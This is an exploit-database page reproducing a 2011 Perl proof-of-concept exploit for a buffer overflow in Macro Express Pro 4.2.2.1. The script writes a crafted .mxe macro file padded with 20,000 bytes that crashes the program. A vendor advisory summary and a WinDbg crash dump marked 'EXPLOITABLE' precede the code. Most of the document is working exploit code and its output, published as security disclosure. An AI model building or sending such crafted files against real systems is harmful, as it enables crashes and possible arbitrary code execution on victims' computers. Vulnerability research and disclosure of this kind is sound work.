Macro Express Pro 4.2.2.1 – ‘.MXE’ File Syntactic Analysis Buffer Overflow (PoC)

  • 作者: LiquidWorm
    日期: 2011-01-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15959/
  • #!/usr/local/bin/perl
    #
    #
    # Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC
    #
    #
    # Vendor: Insight Software Solutions, Inc.
    # Product web page: http://www.macros.com
    # Affected version: 4.2.2.1 and 4.2.1.1
    #
    # Summary: Macro Express is the premier Windows macro utility. With
    # Macro Express, you can record, edit and play back mouse and keyboard
    # macros. Its powerful tools and robust features will make you more
    # productive.
    #
    # Desc: Macro Express Pro suffers from a buffer overflow vulnerability when
    # importing playable macro files (.mxe) with added large amount of bytes into
    # the elements: string, integer, float and control. The user input is not
    # properly sanitized which may give the attackers the possibility for an
    # arbitrary code execution on the affected system. Failure of exploitation
    # may result in a denial of service.
    #
    # ~ Note: The PoC file is made with the script:
    #
    # <OPEN FOLDER Path="%ALLUSERSPROFILE%"/>
    #
    # Which when double clicking the .mxe poc file, 100% CPU usage and OS
    # hanging occurs.
    #
    # ~
    #
    # Tested on: Microsoft Windows XP Professional SP3 (EN)
    #
    #
    # -------------------------------------------------------------------
    #
    # (db0.37c): Access violation - code c0000005 (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=41414141 ebx=00000000 ecx=00000000 edx=01171cd8 esi=01171cd8 edi=00000000
    # eip=7c919af2 esp=0014f288 ebp=0014f2fc iopl=0 nv up ei pl nz na pe nc
    # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206
    # ntdll!RtlpWaitForCriticalSection+0x5b:
    # 7c919af2 ff4010inc dword ptr [eax+10h]ds:0023:41414151=????????
    # 0:000> g
    # (db0.37c): Access violation - code c0000005 (first chance)
    # First chance exceptions are reported before any exception handling.
    # This exception may be expected and handled.
    # eax=41414141 ebx=0116ca00 ecx=0114dc90 edx=41414140 esi=41414140 edi=0014f330
    # eip=0042633d esp=0014e870 ebp=0014e8a0 iopl=0 nv up ei ng nz ac pe cy
    # cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010297
    # macedit+0x2633d:
    # 0042633d 8b04b0mov eax,dword ptr [eax+esi*4] ds:0023:46464641=????????
    # 0:000> !exploitable
    # Exploitability Classification: EXPLOITABLE
    # User Mode Write AV starting at ntdll!RtlpWaitForCriticalSection+0x000000000000005b (Hash=0x351d4e4e.0x3f68114b)
    # 
    # User mode write access violations that are not near NULL are exploitable.
    #
    # -------------------------------------------------------------------
    #
    #
    # Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
    # liquidworm gmail com
    #
    # Zero Science Lab - http://www.zeroscience.mk
    #
    # Advisory ID: ZSL-2011-4986
    # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4986.php
    #
    # 06.01.2011
    #
    
    
    use strict;
    
    print qq{
    
    ------------------------------------------------------------------------------
    ||
    | Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC|
    ||
    |Copyleft (c) 2011, Zero Science Lab |
    ||
    ------------------------------------------------------------------------------
    	};
    
    my $bytes = "\x41" x 20000;
    
    my $format = "<<Macro Express 4 Playable Macro>>\x0d\x0a".
    	 "[string:%$bytes% elements:99 global:true]\x0d\x0a". # Default: string:%T%...
    	 "[integer:%N% elements:99 global:true]\x0d\x0a".
    	 "[float:%D% elements:99 global:true]\x0d\x0a".
    	 "[control:%C% elements:99 global:true]\x0d\x0a".
    	 "<<BEGIN SCRIPT>>\x0d\x0a".
    	 "<OPEN FOLDER Path=\"%ALLUSERSPROFILE%\"/>";
    
    my $file = "Playable.mxe";
    print "\n\n[*] Creating $file file...\n";
    open mxe, ">./$file" || die "\nCan't open $file: $!";
    print mxe $format;
    print "\n[.] File successfully mounted!\n\n";
    close mxe;